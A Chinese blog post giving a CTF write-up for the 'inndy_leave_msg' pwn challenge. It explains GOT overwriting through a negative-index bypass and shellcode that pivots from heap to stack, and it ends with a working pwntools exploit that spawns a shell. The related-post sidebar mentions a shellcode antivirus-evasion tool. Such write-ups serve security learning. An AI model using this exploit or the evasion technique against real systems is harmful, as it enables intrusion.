花式shellcode&&inndy_leave_msg

最新推荐文章于 2024-05-19 07:49:28 发布
最新推荐文章于 2024-05-19 07:49:28 发布
阅读量243 收藏 2
点赞数 2
分类专栏: linux_pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123964954
版权

文章目录

最近做了几个题目,都是要利用写shellcode
shellcode一定要利用好当前的寄存器环境

inndy_leave_msg

inndy_leave_msg

题目分析

保护

在这里插入图片描述
这里的栈和堆都是可以执行的,由于我的内核版本较高,所以看上去堆不可执行
对于高版本内核,execstack只是允许栈可执行,要想让所有data都可以执行,需要利用execall

漏洞

在这里插入图片描述
buf可以用来写shellcode,但无法溢出覆盖返回地址
由于这里有两个回合
dwrod_804a060离got比较近,所以考虑覆盖puts got表地址
strdup会把内容copy到堆里面然后ret堆地址,但这里遇到\x0就不会copy了

攻击

利用思路

大部分shellcode在栈上,需要从堆里面跳到栈上
在这里插入图片描述
\x00前面的shellcode会被copy到堆里面
add esp,0x35刚好把就是下一回合puts的时候的esp挪到\x00\xc3的位置,然后就可以顺利执行
\x00\xc3使add dl,al

exp

sa(b"message:\n", asm("add esp,0x35;jmp esp") + b"\x00\xc3" + asm(shellcraft.sh()))
sa(b"message slot?\n", b" -16")
it()
azraelxuemo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellcode_generate-test_framework
04-06
shellcode_generate-test_framework 非原创,来自 本次工程创建是win32空项目,使用的是VS2015编译relase/x86,编译之前进行如下设置: 创建工程时关闭SDL检查 属性->C/C++->代码生成->运行库->多线程 (/MT)如果是...
leave_msg的wp
一个码农的笔记
11-27 618
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了leave_msg这个题目感觉还不错,我把wp分享出来,方便大家学习 leave_msg的题目要求是: nc hackme.inndy.tw 7715 I am on a vacation, leave the message for me.把leave_msg直接拖入ida中: 这个程序流程很简单
HBase Shell 十大花式玩儿法
weixin_42047967的博客
04-16 748
前言:工欲善其事必先利其器,今天给大家介绍一下HBase Shell十大花式利器,在日常运维工作中,可以试着用起来。 1. 交互模式 也就是我们最常用到的Shell命令行的方式。 $ hbase shell hbase(main):001:0> list2. 非交互模式 $ echo "describe 'test1'" | hbase shell ...
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 393
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
[BJDCTF 2nd]secret&&inndy_rop
、moddemod
07-20 485
[BJDCTF 2nd]secret exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './secret' p = process(proc_name) # p = remote('node3.buuoj.cn', 28831)
利用rsp进行shellcode跳转&&缩短shellcode&&csaw2018_shell_code
azraelxuemo的博客
04-04 466
文章目录csaw2018_shell_code题目分析题目保护漏洞攻击第一块的shellcode栈溢出的shellcodeallpayload 最近做了挺多这种缩短shellcode的题目,其实大概思想就是要利用现有的寄存器条件缩短shellcode,当然还是有一些基础的缩短shellcode的方法,用push pop来替换mov csaw2018_shell_code csaw2018_shell_code 题目分析 题目保护 栈可执行 漏洞 这两个地方可以填入shellcode 这里有个告诉栈地址
以\x00开头的shellcode&&starctf_2019_babyshell
azraelxuemo的博客
03-25 927
文章目录为什么会有这个想法starctf_2019_babyshell思路难点exp 为什么会有这个想法 虽然这个标题看起来很奇怪,但有时候其实可以用得上 有时候我们输入输出是通过read来进行的,并且中间不会涉及到strcpy,strcat这些函数,所以我们可以放心的在shellcode里面插入\x00 有时候其实我们需要利用到\x00,因为strcmp,strlen,等等包括很多时候自定义的函数实现都是以\x00作为结束的标志 光说没用,我们看例题 starctf_2019_babyshell star
inndy_onepunch(text段有时是可以修改的)
seaaseesa的博客
05-01 593
inndy_onepunch 用IDA分析一下程序,任意地址写一个字节。 想不到的是,text段可以修改,因此,我们可以直接修改text的指令,来达到多次利用。 #coding:utf8 #想不到text段竟然可以写 from pwn import * context(os='linux',arch='amd64') #sh = process('./onepunch') sh = ...
shellcode免杀工具Go_Bypass的使用
热门推荐
江左盟的博客
02-28 2万+
简介 该工具是由Arks7使用Go语言开发的一个免杀生成器模板,目前可以过国内主流杀毒。 GitHub地址: https://github.com/Arks7/Go_Bypass 用法 使用CobaltStrike生成payload,输出格式为Raw,4.3版本需要勾选X64,如图: 将生成的文件放在Go_Bypass项目目录下,然后执行go env -w GOPROXY=https://goproxy.io,direct配置代理,否则编译报错。然后运行go run main.go,使用默认配置一路回车即
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
此源代码将生成 linux x86的 shellcode
Android系统shellcode编写.zip_android_shellcode
09-23
Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode的编写。
CDL_shellcode_源码
10-02
This is a shellcode file for javascript
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
linux---进程通信
m0_74979625的博客
05-17 554
提示:以下是本篇文章正文内容,下面案例可供参考。
selinux的安全策略可以影响ntp的方式
ALex_zry的博客
05-18 232
默认情况下,NTP使用UDP端口123进行通信,SELinux 策略需要允许NTP守护进程访问该端口。例如,可以创建一个策略,只允许受信任的NTP服务器与本地系统通信。:SELinux 提供了详细的日志和审计功能,可以帮助管理员监控和分析NTP守护进程的行为,以及检测任何潜在的安全问题。:SELinux 还可以限制NTP守护进程可以执行的操作,例如,是否可以打开套接字、是否可以读取或写入特定的设备等。:如果SELinux策略设置得太严格,可能会与NTP的正常操作发生冲突,导致NTP无法正常同步时间。
Linux】Centos7安装Redis
m0_72166275的博客
05-17 323
Reid 官网下载 Redis 7.2。
k8s笔记 | 高度调度
最新发布
weixin_41104307的博客
05-19 316
简介:在k8s中周期性运行计划任务,与linux中的crontab相同;注意点 CornJob执行的时间是controller-manager的时间,所以一定要确保controller-manager的时间是准确的,另外cornjob。
操作系统 实验13 批处理操作接口3:引用与命令替换
m0_63093530的博客
05-14 155
结果:第一个和第三个命令是错的,第二个和第四个命令是对的。echo "这是命令替换形式1...$date1"echo "$sv ++++加上另一些字符!2、输出字符串“China's panda”命令:echo China\'s panda。6、将命令date执行结果赋予变量date1。7、将命令date执行结果赋予变量date2。1、输出字符串“$Dollar”命令:echo \$Dollar。命令:date2=$(date)命令:date1=`date`
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值